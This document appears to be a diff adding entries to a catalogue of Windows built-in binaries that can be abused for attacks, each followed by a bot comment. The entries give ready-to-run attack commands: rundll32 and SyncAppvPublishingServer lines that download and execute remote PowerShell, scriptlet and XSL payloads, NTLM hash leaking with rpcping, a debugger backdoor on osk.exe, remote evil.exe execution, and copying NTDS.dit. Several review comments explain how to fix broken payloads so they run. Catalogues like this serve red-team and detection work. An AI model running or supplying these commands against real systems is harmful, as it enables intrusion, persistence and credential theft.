| 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	 | ||||
| 	 | ||||
| 		]]> | ||||
| </script> | ||||
| </registration> | ||||
| </scriptlet> | ||||
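Review bot: this file duplicates Payload/Cmstp_calc.sct above line for line; keep a single scriptlet and have both entries reference it so that a fix lands once. In the comments, "extenstion" and "arbitary" are typos, and "no registry keys are written, since call "uninstall"" would read better as "because the /u switch takes the unregister path".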
							
								
								
									
Archive-Old-Version/OSBinaries/Payload/Wmic_calc.xsl (Normal file, 11 lines)
							| @@ -0,0 +1,11 @@ | ||||
| <?xml version='1.0'?> | ||||
| <stylesheet | ||||
| xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | ||||
| xmlns:user="placeholder" | ||||
| version="1.0"> | ||||
| <output method="text"/> | ||||
| 	<ms:script implements-prefix="user" language="JScript"> | ||||
| 	<![CDATA[ | ||||
| 	var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
| 	]]> </ms:script> | ||||
| </stylesheet> | ||||
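Review bot: unlike Msbuild.csproj, this stylesheet has no comment naming the binary that consumes it or how; the `Wmic_` filename prefix is the only hint, and the Wmic.exe entry is not in this part of the commit. Add an XML comment with the entry name, matching the other payloads. Also note that `xmlns:user="placeholder"` is the declaration that `implements-prefix="user"` refers to, so it is load-bearing even though nothing else uses the `user` prefix; a one-line comment saying so will stop someone from "cleaning" it out.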
							
								
								
									
Archive-Old-Version/OSBinaries/Payload/file.rsp (Normal file, 1 line)
							| @@ -0,0 +1 @@ | ||||
| REGSVR evil.dll | ||||
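Review bot: the name `file.rsp` is generic where every other payload in this folder is prefixed with the entry it belongs to (Cmstp_calc.sct, Mshta_calc.sct, Wmic_calc.xsl); rename it to match the consuming entry, since a one-line `REGSVR evil.dll` gives a reader no way to tell which binary reads response files. `evil.dll` is also a bare name with no path, so what gets loaded depends on the working directory and DLL search order at the time the response file is processed; use an explicit path as the other payloads do.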
							
								
								
									
Archive-Old-Version/OSBinaries/Payload/mscfgtlc.xml (Normal file, 4 lines)
							| @@ -0,0 +1,4 @@ | ||||
| <?xml version="1.0" ?> | ||||
| <MSCONFIGTOOLS> | ||||
| <a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe" DEFAULT_OPT="-nop -sta -enc -w 1 <BASE64ENCCOMMAND>" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/> | ||||
| </MSCONFIGTOOLS> | ||||
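Review bot: in `DEFAULT_OPT="-nop -sta -enc -w 1 <BASE64ENCCOMMAND>"` the `-enc` switch takes the Base64 string as its immediate argument, so `-w 1` sitting between them breaks the command line; reorder to `-nop -sta -w 1 -enc <BASE64ENCCOMMAND>`. The `<BASE64ENCCOMMAND>` placeholder also puts a raw `<` inside an attribute value, which is not well-formed XML; use a marker without angle brackets so the file parses both before and after the placeholder is replaced.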
							
								
								
									
Archive-Old-Version/OSBinaries/Pcalua.exe.md (Normal file, 25 lines)
							| @@ -0,0 +1,25 @@ | ||||
| ## Pcalua.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| pcalua.exe -a calc.exe | ||||
| Open the target .EXE using the Program Compatibility Assistant. | ||||
|  | ||||
| pcalua.exe -a \\server\payload.dll | ||||
| Open the target .DLL file with the Program Compatibilty Assistant. | ||||
|  | ||||
| pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java | ||||
| Open the target .CPL file with the Program Compatibility Assistant. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/KyleHanslovan/status/912659279806640128 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\pcalua.exe | ||||
|     | ||||
| * Notes: Thanks to: | ||||
| fab - @0rbz_ | ||||
| Kyle Hanslovan - @KyleHanslovan | ||||
|    | ||||
|     | ||||
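Review bot: "Compatibilty" in the second description should be "Compatibility". The Notes block spreads "Thanks to:" over three lines while the other entries keep the credits on the Notes line itself; match that layout. The Full path lists only System32, whereas entries in this commit with a 32-bit copy list SysWOW64 as well; confirm whether pcalua.exe has one and add it if so.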
							
								
								
									
Archive-Old-Version/OSBinaries/Pcwrun.exe.md (Normal file, 16 lines)
							| @@ -0,0 +1,16 @@ | ||||
| ## Pcwrun.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Pcwrun.exe c:\temp\beacon.exe | ||||
| Open the target .EXE file with the Program Compatibility Wizard. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/991335019833708544 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\pcwrun.exe | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken   | ||||
|     | ||||
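Review bot: the Full path section lists only c:\windows\system32\pcwrun.exe, while the other entries in this commit list both the System32 and SysWOW64 copies; either add the SysWOW64 path if one exists or state explicitly that there is only one copy. For the sample command, a benign target such as calc.exe (as used in the Pcalua and Scriptrunner entries) would make it clearer that the entry documents the execution primitive rather than a particular payload name.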
							
								
								
									
17
Archive-Old-Version/OSBinaries/Powershell.exe.md
Normal file
							| @@ -0,0 +1,17 @@ | ||||
| ## Powershell.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| powershell -ep bypass - < c:\temp:ttt | ||||
| Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/Moriarty_Meng/status/984380793383370752 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | ||||
|   * C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | ||||
|     | ||||
| * Notes: Thanks to Moriarty - @Moriarty_Meng   | ||||
|     | ||||
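Review bot: the description says the ADS holds an "encoded" PowerShell command, but the command line has no encoding switch; the lone "-" tells powershell.exe to read the script from standard input, which the "< c:\temp:ttt" redirection supplies from the stream. Either drop "encoded" or state what encoding the stream content is expected to have. The description should also say that c:\temp:ttt is a stream attached to the c:\temp directory itself, not to a file, since that is the detail a reader checking for this technique needs.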
							
								
								
									
18
Archive-Old-Version/OSBinaries/PresentationHost.exe.md
Normal file
							| @@ -0,0 +1,18 @@ | ||||
| ## PresentationHost.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Presentationhost.exe C:\temp\Evil.xbap | ||||
| Executes the target XAML Browser Application (XBAP) file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
|   * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\PresentationHost.exe      | ||||
|   * c:\windows\sysWOW64\PresentationHost.exe     | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
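Review bot: the Full path lines carry trailing whitespace and use "sysWOW64" where the other entries write "SysWOW64"; normalise the casing and strip the whitespace so the path list can be consumed by tooling without cleanup. The "Executes the target XAML Browser Application (XBAP) file" description is fine, but the command line capitalises the binary as "Presentationhost.exe" while the heading and paths use "PresentationHost.exe"; use one spelling.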
							
								
								
									
24
Archive-Old-Version/OSBinaries/Print.exe.md
Normal file
							| @@ -0,0 +1,24 @@ | ||||
| ## Print.exe | ||||
| * Functions: Download, Copy, Add ADS | ||||
| ``` | ||||
|  | ||||
| print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe | ||||
| Copy file.exe into the Alternate Data Stream (ADS) of file.txt. | ||||
|  | ||||
| print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe | ||||
| Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe | ||||
|  | ||||
| print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe | ||||
| Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/Oddvarmoe/status/985518877076541440 | ||||
|   * https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\print.exe | ||||
|   * C:\Windows\SysWOW64\print.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
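Review bot: the third example's description says "from a network share", but the path in the command is a WebDAV server (\\WebDavServer\Folder\File.exe), and WebDAV is what makes this a Download rather than a plain copy; say so explicitly so the Functions line is justified by the example. The second description is also missing its terminal period.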
							
								
								
									
23
Archive-Old-Version/OSBinaries/Psr.exe.md
Normal file
							| @@ -0,0 +1,23 @@ | ||||
| ## Psr.exe | ||||
| * Functions: Surveillance | ||||
| ``` | ||||
|  | ||||
| psr.exe /start /gui 0 /output c:\users\user\out.zip | ||||
| Capture screenshots of the desktop and save them in the target .ZIP file. | ||||
|  | ||||
| psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip | ||||
| Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file. | ||||
|  | ||||
| psr.exe /stop | ||||
| Stop the Problem Step Recorder. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\Psr.exe | ||||
|   * C:\Windows\SysWOW64\Psr.exe | ||||
|     | ||||
| * Notes: Thanks to    | ||||
|     | ||||
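Review bot: the Notes line is an unfilled template ("Thanks to" with no name); either credit the source (the SANS summit PDF under Resources) or drop the line. The "/gui 0" switch is what hides the recorder window in the first two examples, which is the notable detail for a Surveillance entry and deserves a mention in the descriptions.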
							
								
								
									
25
Archive-Old-Version/OSBinaries/Regasm.exe.md
Normal file
							| @@ -0,0 +1,25 @@ | ||||
| ## Regasm.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| regasm.exe /U AllTheThingsx64.dll | ||||
| Loads the target .DLL file and executes the UnRegisterClass function. | ||||
|  | ||||
| regasm.exe AllTheThingsx64.dll | ||||
| Loads the target .DLL file and executes the RegisterClass function. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md | ||||
|   * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
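Review bot: "UnRegisterClass" and "RegisterClass" in the descriptions are the method names used in the linked RegSvcsRegAsmBypass.cs payload, not fixed entry points of regasm.exe; what regasm invokes is whichever static methods the assembly marks with the ComRegisterFunction and ComUnregisterFunction attributes. The descriptions should say this, otherwise a reader will look for those names in other assemblies. The examples also pass a bare file name; since regasm.exe lives under the .NET Framework directories, noting that the .DLL is resolved relative to the current directory would avoid confusion.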
							
								
								
									
17
Archive-Old-Version/OSBinaries/Register-cimprovider.exe.md
Normal file
							| @@ -0,0 +1,17 @@ | ||||
| ## Register-cimprovider.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Register-cimprovider -path "C:\folder\evil.dll" | ||||
| Load the target .DLL. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/PhilipTsukerman/status/992021361106268161 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Register-cimprovider.exe | ||||
|   * c:\windows\sysWOW64\Register-cimprovider.exe | ||||
|     | ||||
| * Notes: Thanks to PhilipTsukerman - @PhilipTsukerman   | ||||
|     | ||||
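Review bot: the Notes section does not say whether registering a provider needs elevated rights, while the Runonce and Wab entries in this commit state "Requires Administrative access" explicitly; add the same statement here (or say none is needed) so the entries are comparable. The path list also uses "sysWOW64" casing, unlike the System32/SysWOW64 form used elsewhere.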
							
								
								
									
22
Archive-Old-Version/OSBinaries/Regsvcs.exe.md
Normal file
							| @@ -0,0 +1,22 @@ | ||||
| ## Regsvcs.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| regsvcs.exe AllTheThingsx64.dll | ||||
| Loads the target .DLL file and executes the RegisterClass function. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md | ||||
|   * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
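Review bot: this entry repeats the Regasm entry's resources and payload name but omits the unregister form; if regsvcs.exe has an equivalent uninstall switch it should be listed for parity, and if it does not, the difference should be stated. As in the Regasm entry, "RegisterClass" is the method name from the linked RegSvcsRegAsmBypass.cs rather than a fixed regsvcs entry point, so the description should attribute the name to the payload.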
							
								
								
									
22
Archive-Old-Version/OSBinaries/Regsvr32.exe.md
Normal file
							| @@ -0,0 +1,22 @@ | ||||
| ## Regsvr32.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
| Execute the specified remote .SCT script with scrobj.dll. | ||||
|  | ||||
|  | ||||
| Execute the specified local .SCT script with scrobj.dll. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md | ||||
|   * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   * https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\regsvr32.exe | ||||
|   * C:\Windows\SysWOW64\regsvr32.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
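Review bot: the second example is missing its command line; only the description "Execute the specified local .SCT script with scrobj.dll." is present above the closing fence. Add the command, which differs from the first only in the "/i:" argument pointing at a local file rather than a URL. The first example's "/s /n /u" switches also deserve a word in the description (silent, skip DllRegisterServer, unregister), since those are what make the scrobj.dll form work and what a detection rule would key on.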
							
								
								
									
21
Archive-Old-Version/OSBinaries/Replace.exe.md
Normal file
							| @@ -0,0 +1,21 @@ | ||||
| ## Replace.exe | ||||
| * Functions: Copy, Download | ||||
| ``` | ||||
|  | ||||
| replace.exe C:\Source\File.cab C:\Destination /A | ||||
| Copy the specified file to the destination folder. | ||||
|  | ||||
| replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A | ||||
| Copy the specified file to the destination folder. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/elceef/status/986334113941655553 | ||||
|   * https://twitter.com/elceef/status/986842299861782529 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\replace.exe | ||||
|   * C:\Windows\SysWOW64\replace.exe | ||||
|     | ||||
| * Notes: Thanks to elceef - @elceef   | ||||
|     | ||||
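Review bot: both descriptions are identical, but the second example reads from a WebDAV host (\\webdav.host.com\foo\bar.exe), which is what justifies the Download function; the description should say the file is fetched from the remote WebDAV share. It would also help to explain the "/A" switch, which adds files that do not yet exist in the destination instead of replacing existing ones.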
							
								
								
									
20
Archive-Old-Version/OSBinaries/Robocopy.exe.md
Normal file
							| @@ -0,0 +1,20 @@ | ||||
| ## Robocopy.exe | ||||
| * Functions: Copy | ||||
| ``` | ||||
|  | ||||
| Robocopy.exe C:\SourceFolder C:\DestFolder | ||||
| Copy the entire contents of the SourceFolder to the DestFolder. | ||||
|  | ||||
| Robocopy.exe \\SERVER\SourceFolder C:\DestFolder | ||||
| Copy the entire contents of the SourceFolder to the DestFolder. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\binary.exe | ||||
|   * c:\windows\sysWOW64\binary.exe | ||||
|     | ||||
| * Notes: Thanks to Name of guy - @twitterhandle   | ||||
|     | ||||
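Review bot: the Full path and Notes sections still contain the template placeholders ("c:\windows\system32\binary.exe" and "Name of guy - @twitterhandle"); the path should be C:\Windows\System32\Robocopy.exe (plus the SysWOW64 copy if it is shipped there), and the credit line should be filled in or removed. The second description should also say the source is a UNC share, since that is the only difference from the first example.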
							
								
								
									
26
Archive-Old-Version/OSBinaries/Rpcping.exe.md
Normal file
							| @@ -0,0 +1,26 @@ | ||||
| ## Rpcping.exe | ||||
| * Functions: Credentials | ||||
| ``` | ||||
|  | ||||
| rpcping -s 127.0.0.1 -t ncacn_np | ||||
| Send a RPC test connection to the target server (-s) sending the password hash in the process. | ||||
|  | ||||
| rpcping -s 192.168.1.10 -ncacn_np | ||||
| Send a RPC test connection to the target server (-s) sending the password hash in the process. | ||||
|  | ||||
| rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM | ||||
| Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/subtee/status/872797890539913216 | ||||
|   * https://github.com/vysec/RedTips | ||||
|   * https://twitter.com/vysecurity/status/974806438316072960 | ||||
|   * https://twitter.com/vysecurity/status/873181705024266241 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\rpcping.exe | ||||
|   * C:\Windows\SysWOW64\rpcping.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity   | ||||
|     | ||||
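Review bot: the second command line ("rpcping -s 192.168.1.10 -ncacn_np") appears to have lost the "-t" switch before the protocol sequence that the first example uses; as written the argument is unlikely to parse. The descriptions should also read "an RPC" rather than "a RPC", and "sending the password hash" overstates what happens: the client authenticates with NTLM, so what reaches the target is the NetNTLM challenge-response, which is why the entry sits under Credentials.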
							
								
								
									
36
Archive-Old-Version/OSBinaries/Rundll32.exe.md
Normal file
							| @@ -0,0 +1,36 @@ | ||||
| ## Rundll32.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| rundll32.exe AllTheThingsx64,EntryPoint | ||||
| Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. | ||||
|  | ||||
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" | ||||
| Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. | ||||
|  | ||||
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); | ||||
| Use Rundll32.exe to execute a JavaScript script that runs calc.exe. | ||||
|  | ||||
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} | ||||
| Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. | ||||
|  | ||||
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") | ||||
| Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. | ||||
|  | ||||
| rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain | ||||
| Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ | ||||
|   * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 | ||||
|   * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md | ||||
|   * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\rundll32.exe | ||||
|   * C:\Windows\SysWOW64\rundll32.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
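Review bot: the second example (the "powershell -nop -exec bypass" one) is missing the closing parenthesis of the Run(...) call after its string argument, so the JavaScript will not parse as written; compare the calc example, which closes its w.run(...) call. The examples also alternate between "mshtml" and "mshtml.dll" in the "\..\mshtml,RunHTMLApplication" fragment; pick one form, or note that both resolve, since inconsistent spellings read as a copy error.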
							
								
								
									
19
Archive-Old-Version/OSBinaries/Runonce.exe.md
Normal file
							| @@ -0,0 +1,19 @@ | ||||
| ## Runonce.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Runonce.exe /AlternateShellStartup | ||||
| Executes a Run Once Task that has been configured in the registry. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/990717080805789697 | ||||
|   * https://cmatskas.com/configure-a-runonce-task-on-windows/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\runonce.exe | ||||
|   * c:\windows\sysWOW64\runonce.exe | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
| Requires Administrative access.   | ||||
|     | ||||
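Review bot: the description says the task is "configured in the registry" but not where; the linked cmatskas.com post covers the key, and naming it in the entry would let readers verify why Administrative access is required. The "Requires Administrative access." line is also placed on a bare line after the Notes bullet, so it renders outside the list item.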
							
								
								
									
17
Archive-Old-Version/OSBinaries/Runscripthelper.exe.md
Normal file
							| @@ -0,0 +1,17 @@ | ||||
| ## Runscripthelper.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test | ||||
| Execute the PowerShell script named test.txt. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe     | ||||
|   * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe      | ||||
|     | ||||
| * Notes: Thanks to Matt Graeber - @mattifestation   | ||||
|     | ||||
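Review bot: the two Full path entries are tied to specific Windows 10 builds (10.0.16299.15 and 10.0.16299.192) and carry trailing whitespace; the WinSxS directory name changes with every build, so the entry should say the path has to be located by pattern rather than treated as fixed. The description should also point out that the script is named test.txt, i.e. the extension does not need to be .ps1 for the content to be run as PowerShell, since that is the noteworthy property of this binary.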
							
								
								
									
19
Archive-Old-Version/OSBinaries/SC.exe.md
Normal file
							| @@ -0,0 +1,19 @@ | ||||
| ## SC.exe | ||||
| * Functions: Execute, Read ADS, Create Service, Start Service | ||||
| ``` | ||||
|  | ||||
| sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto | ||||
| sc start evilservice | ||||
|  | ||||
|  | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\sc.exe | ||||
|   * C:\Windows\SysWOW64\sc.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
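Review bot: the two commands have no description lines, unlike every other entry in this commit; add one explaining that the service's binPath points at a cmd.exe copy stored in the ADS of c:\ADS\file.txt and that starting the service runs it. The binPath string also escapes backslashes inconsistently ("c:\\ADS\\file.txt" versus "c:\ADS\works.txt"); both paths should use the same form. Finally, creating and starting a service requires administrative rights, which the Notes section should state as the Runonce and Wab entries do.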
							
								
								
									
22
Archive-Old-Version/OSBinaries/Scriptrunner.exe.md
Normal file
							| @@ -0,0 +1,22 @@ | ||||
| ## Scriptrunner.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Scriptrunner.exe -appvscript calc.exe | ||||
| Execute calc.exe. | ||||
|  | ||||
| ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" | ||||
| Execute the calc.cmd script on the remote share. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/KyleHanslovan/status/914800377580503040 | ||||
|   * https://twitter.com/NickTyrer/status/914234924655312896 | ||||
|   * https://github.com/MoooKitty/Code-Execution | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\scriptrunner.exe | ||||
|   * c:\windows\sysWOW64\scriptrunner.exe | ||||
|     | ||||
| * Notes: Thanks to Nick Tyrer - @NickTyrer   | ||||
|     | ||||
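Review bot: the binary name is capitalised two ways ("Scriptrunner.exe" and "ScriptRunner.exe") across the examples; use one form. The second description should say the script is fetched from the remote share and executed locally, and the Resources list cites Kyle Hanslovan's tweet while the Notes credit only Nick Tyrer, which looks like an omission.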
| @@ -0,0 +1,16 @@ | ||||
| ## SyncAppvPublishingServer.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" | ||||
| Example command on how inject Powershell code into the process | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/monoxgas/status/895045566090010624 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\SyncAppvPublishingServer.exe | ||||
|     | ||||
| * Notes: Thanks to Nick Landers - @monoxgas   | ||||
|     | ||||
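Review bot: the description ("Example command on how inject Powershell code into the process") has a grammar error and does not say what the example does; reword to something like "Example of injecting PowerShell code into the process: downloads script.ps1 from the URL and runs it with IEX." The entry lists only the System32 path; if there is no SysWOW64 copy, saying so would keep it consistent with the other entries.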
							
								
								
									
58
Archive-Old-Version/OSBinaries/WMIC.exe.md
Normal file
							| @@ -0,0 +1,58 @@ | ||||
| ## WMIC.exe | ||||
| * Functions: Reconnaissance, Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| wmic.exe process call create calc | ||||
| Execute calc.exe. | ||||
|  | ||||
| wmic.exe process call create "c:\ads\file.txt:program.exe" | ||||
| Execute a .EXE file stored as an Alternate Data Stream (ADS). | ||||
|  | ||||
| wmic.exe useraccount get /ALL | ||||
| List the user accounts on the machine. | ||||
|  | ||||
| wmic.exe process get caption,executablepath,commandline | ||||
| Gets the command line used to execute a running program. | ||||
|  | ||||
| wmic.exe qfe get description,installedOn /format:csv | ||||
| Gets a list of installed Windows updates. | ||||
|  | ||||
| wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%") | ||||
| Check to see if the target system is running SQL. | ||||
|  | ||||
| get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" | ||||
| Use the PowerShell cmdlet to list the shares on a remote server. | ||||
|  | ||||
| wmic.exe /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" | ||||
| Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. | ||||
|  | ||||
| wmic.exe /node:"192.168.0.1" process call create "evil.exe" | ||||
| Execute evil.exe on the remote system. | ||||
|  | ||||
| wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" | ||||
| Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. | ||||
|  | ||||
| wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" | ||||
